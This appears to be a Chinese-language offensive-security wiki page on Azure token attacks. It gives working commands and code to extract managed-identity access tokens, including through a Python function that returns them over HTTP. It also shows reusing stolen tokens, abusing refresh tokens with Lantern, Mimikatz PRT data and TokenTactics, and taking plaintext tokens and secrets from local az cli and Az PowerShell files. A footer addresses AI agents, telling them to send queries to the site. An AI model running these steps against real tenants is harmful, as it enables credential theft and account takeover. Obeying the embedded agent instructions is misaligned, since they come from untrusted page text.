# 令牌

```
来自托管身份的令牌
MSI_ENDPOINT是IDENTITY_ENDPOINT的别名，MSI_SECRET是IDENTITY_HEADER的别名。
从环境中找到 IDENTITY_HEADER 和 IDENTITY_ENDPOINT ：env
大多数情况下，您需要以下资源之一的令牌：
https://storage.azure.com
https://vault.azure.net
https://graph.microsoft.com
https://management.azure.com
```

**通过 Powershell 的 Azure API**

```
从IDENTITY_HEADER和IDENTITY_ENDPOINT获取access_token : 。system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
然后查询 Azure REST API 以获取订阅 ID等。
$Token = 'eyJ0eX..'
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
# $URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
 Method = 'GET'
 Uri = $URI
 Headers = @{
 'Authorization' = "Bearer $Token"
 }
}
(Invoke-RestMethod @RequestParams).value 
列出资源并检查 runCommand 权限
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01'
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/<RG-NAME>/providers/Microsoft.Compute/virtualMachines/<RESOURCE/providers/Microsoft.Authorization/permissions?apiversion=2015-07-01'
```

**通过 Python 版本的 Azure API**

```
IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
IDENTITY_HEADER = os.environ['IDENTITY_HEADER']

print("[+] Management API")
cmd = 'curl "%s?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print("Access Token: "+json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])

print("\r\n[+] Graph API")
cmd = 'curl "%s?resource=https://graph.microsoft.com/&api-version=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
val = os.popen(cmd).read()
print(json.loads(val)["access_token"])
print("ClientID/AccountID: "+json.loads(val)["client_id"])
或在 Python 函数中
import logging, os
import azure.functions as func

def main(req: func.HttpRequest) -> func.HttpResponse:
    logging.info('Python HTTP trigger function processed a request.')
    IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT']
    IDENTITY_HEADER = os.environ['IDENTITY_HEADER']
    cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER)
    val = os.popen(cmd).read()
    return func.HttpResponse(val, status_code=200)
```

**获得令牌**

```
主刷新令牌的有效期为 14 天！

az cli
az account get-access-token 
az account get-access-token --resource-type aad-graph
或者Az
(Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
或从使用 IDENTITY_HEADER 和 IDENTITY_ENDPOINT 的托管标识
```

**使用令牌**

```
令牌包含所有声明，包括 MFA 和条件访问的声明

AZ Powershell
PS C:\Tools> $token = 'eyJ0e..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -AccountId <ACCOUNT-ID>

# Access Token and Graph Token
PS C:\Tools> $token = 'eyJ0eX..'
PS C:\Tools> $graphaccesstoken = 'eyJ0eX..'
PS C:\Tools> Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
PS C:\Tools> Get-AzResource
ERROR: 'this.Client.SubscriptionId' cannot be null.
托管标识对任何 Azure 资源都没有权限。 切换到 GraphAPI
AzureAD
Import-Module C:\Tools\AzureAD\AzureAD.psd1
$AADToken = 'eyJ0…'
Connect-AzureAD -AadAccessToken $AADToken -TenantId <TENANT-ID> -AccountId <ACCOUNT-ID>
```

**刷新令牌**

```
https://github.com/ConstantinT/Lantern
Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe mdm --joindevice --accesstoken (or some combination from the token part) --devicename <Name> --outpfxfile <Some path>
Lantern.exe token --username <Username> --password <Password>
Lantern.exe token --refreshtoken <RefreshToken>
Lantern.exe devicekeys --pfxpath XXXX.pfx --refreshtoken (--prtcookie / ---username + --password ) 
https://github.com/rvrsh3ll/TokenTactics
Import-Module .\TokenTactics.psd1
CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Clear-Token                                        0.0.1      TokenTactics
Function        Dump-OWAMailboxViaMSGraphApi                       0.0.1      TokenTactics
Function        Forge-UserAgent                                    0.0.1      TokenTactics
Function        Get-AzureToken                                     0.0.1      TokenTactics
Function        Get-TenantID                                       0.0.1      TokenTactics
Function        Open-OWAMailboxInBrowser                           0.0.1      TokenTactics
Function        Parse-JWTtoken                                     0.0.1      TokenTactics
Function        RefreshTo-AzureCoreManagementToken                 0.0.1      TokenTactics
Function        RefreshTo-AzureManagementToken                     0.0.1      TokenTactics
Function        RefreshTo-DODMSGraphToken                          0.0.1      TokenTactics
Function        RefreshTo-GraphToken                               0.0.1      TokenTactics
Function        RefreshTo-MAMToken                                 0.0.1      TokenTactics
Function        RefreshTo-MSGraphToken                             0.0.1      TokenTactics
Function        RefreshTo-MSManageToken                            0.0.1      TokenTactics
Function        RefreshTo-MSTeamsToken                             0.0.1      TokenTactics
Function        RefreshTo-O365SuiteUXToken                         0.0.1      TokenTactics
Function        RefreshTo-OfficeAppsToken                          0.0.1      TokenTactics
Function        RefreshTo-OfficeManagementToken                    0.0.1      TokenTactics
Function        RefreshTo-OutlookToken                             0.0.1      TokenTactics
Function        RefreshTo-SubstrateToken                           0.0.1      TokenTactics
```

**窃取令牌**

```
获取 AzurePasswords
>Import-Module Microburst.psm1
>Get-AzurePasswords
>Get-AzurePasswords -Verbose | Out-GridView
从 az cli 窃取令牌
az cli 将访问令牌以明文形式存储在目录中的accessTokens.json中C:\Users\<username>\.Azure
同一目录中的 azureProfile.json 包含有关订阅的信息。
从 az powershell 窃取令牌
Az PowerShell 将访问令牌以明文形式存储在目录中的TokenCache.dat中C:\Users\<username>\.Azure
它还在AzureRmContext.json中以明文形式存储ServicePrincipalSecret
用户可以使用保存令牌Save-AzContext
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.heresecurity.wiki/yun-an-quan/azure/ling-pai.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.